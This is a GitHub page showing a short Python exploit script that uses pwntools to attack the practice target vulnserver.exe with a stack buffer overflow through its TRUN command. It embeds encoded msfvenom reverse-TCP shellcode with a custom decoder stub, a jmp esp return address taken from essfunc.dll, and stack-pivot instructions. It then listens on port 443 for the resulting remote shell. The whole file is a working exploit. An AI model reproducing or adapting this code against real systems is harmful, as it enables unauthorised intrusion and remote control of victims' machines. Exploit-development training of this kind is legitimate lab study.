-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest-exploit.py
More file actions
59 lines (52 loc) · 2.34 KB
/
test-exploit.py
File metadata and controls
59 lines (52 loc) · 2.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#vulnserver.exe
from pwn import *
#0x625011b1 : jmp eax | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Documents and Settings\XPXP\Desktop\vulnserver-master\vulnserver-master\essfunc.dll)
#jmp = p32(0x625011b1)
jmpesp = p32(0x625011eb)
#Custom XOR 88, SUB 10, XOR 97, SUB 2, NOT Encoded w/ Decoder Stub
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -f python
#Payload size: 40 (decoder) + 324 (encoded) = 364 bytes
#Final size of python file: 1582 bytes
buf = (
"\xeb\x17\x5e\x80\x3e\x88\x74\x16\xf6\x16\x80\x06\x02\x80\x36\x97"
"\x80\x06\x10\x80\x36\x88\x46\xeb\xea\xe8\xe4\xff\xff\xff\x0e\x3a"
"\x94\x12\x12\x12\xb2\x9b\x37\xc3\x52\xb6\x9d\xa2\xc2\x9d\xa4\x1e"
"\x9d\xa4\xe6\x9d\x84\xfa\x21\x49\xdc\xf8\xc3\x11\x7e\xce\xb3\x8e"
"\x14\xfe\xf2\x53\x61\x1f\x13\x59\x34\x04\xa4\xa9\x9d\xa4\xe2\x9d"
"\xdc\xce\x9d\xde\xe3\x8a\x35\xda\x13\x23\xa3\x9d\xab\xf2\x13\x25"
"\x9d\xdb\xea\x35\xcc\xdb\x9d\xc6\x9d\x13\x28\xc3\x11\x7e\x53\x61"
"\x1f\x13\x59\xca\x32\x87\x08\x15\x8f\x0a\xcd\x8f\xf6\x87\x36\xaa"
"\x9d\xaa\xf6\x13\x25\xb8\x9d\x1e\xdd\x9d\xaa\xee\x13\x25\x9d\x16"
"\x9d\x13\x22\x9b\xd6\xf6\xf6\xad\xad\xb3\xab\xac\xa3\x11\x32\xb1"
"\xb1\xac\x9d\xe4\x3d\x9f\xaf\xba\xc5\xc4\x12\x12\xba\x89\x85\xc4"
"\xb1\xa6\xba\xde\x89\xf8\x19\x11\x27\x4a\x62\x13\x12\x12\xfb\x56"
"\xa6\xa2\xba\xfb\x92\xbd\x12\x11\x27\xa2\xa2\xa2\xa2\xd2\xa2\xd2"
"\xa2\xba\x3c\x21\x31\x32\x11\x27\x69\xbc\x17\xba\x52\x7a\x86\x59"
"\xba\x14\x12\x13\x4d\x9b\x38\xbc\xe2\xa8\xa9\xba\x6b\x77\x86\xb3"
"\x11\x27\x97\x52\x86\x1e\x11\xe0\x1a\x87\x3e\xba\x02\x47\x74\xa8"
"\x11\x27\xba\xb5\xbf\xb6\x12\x9b\x35\xa9\xa9\xa9\xc3\x08\xbc\xe4"
"\xab\xa8\x34\x0f\xb8\x59\xd6\xf6\xce\x13\x13\x9f\xd6\xf6\xe2\x58"
"\x12\xd6\xa6\xa2\xa8\xa8\xa8\xd8\xa8\xe0\xa8\xa8\xa5\xa8\xba\x8b"
"\x5e\xd1\x98\x11\x27\x9b\x32\xe0\xa8\xd8\x11\xc2\xba\x1a\x99\xef"
"\xb2\x11\x27\x4d\x02\x47\x74\xa8\xba\x78\x67\x4f\x6f\x11\x27\xce"
"\x18\x8e\x1c\x92\x0d\x32\x87\x17\x4d\xd9\xe5\x84\xc1\xbc\x12\xa5"
"\x11\x27\x88"
)
poc = "TRUN /.:/"
poc += "A" * 16
poc += buf
poc += "A" * ((2003+9)-len(poc))
poc += jmpesp
poc += asm('add eax, 9')
poc += asm('mov esp, eax')
poc += asm('sub esp, 9')
poc += asm('jmp eax')
poc += "C" * (5000-len(poc))
l = listen(443)
r = remote("192.168.116.178", 9999)
print str(r.recvline())
r.send(poc)
r.close()
l.recvline()
l.interactive()
l.close()